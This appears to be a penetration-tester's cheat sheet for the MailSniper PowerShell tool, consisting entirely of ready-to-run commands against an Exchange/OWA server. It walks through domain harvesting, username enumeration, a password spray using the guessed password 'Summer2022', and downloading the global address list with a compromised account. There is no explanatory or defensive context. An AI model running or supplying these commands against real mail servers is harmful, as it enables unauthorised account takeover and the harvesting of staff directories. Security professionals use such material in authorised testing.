==============================================================================
[+] MailSniper
==============================================================================
ipmo C:\Tools\MailSniper\MailSniper.ps1
==============================================================================
[+] Find Domains 
==============================================================================
 Invoke-DomainHarvestOWA -ExchHostname mail.example.io
==============================================================================
[+] Find Users OWA
==============================================================================
 Invoke-UsernameHarvestOWA -ExchHostname mail.example.io -Domain example.io -UserList .\Desktop\possible.txt -OutFile .\Desktop\valid.txt
==============================================================================
[+] Password Spray
==============================================================================
Invoke-PasswordSprayOWA -ExchHostname mail.example.io -UserList .\Desktop\valid.txt -Password Summer2022

==============================================================================
[+] Downloading the global address list
==============================================================================
Get-GlobalAddressList -ExchHostname mail.example.io -UserName example.io\iyates -Password Summer2022 -OutFile .\Desktop\gal.txt

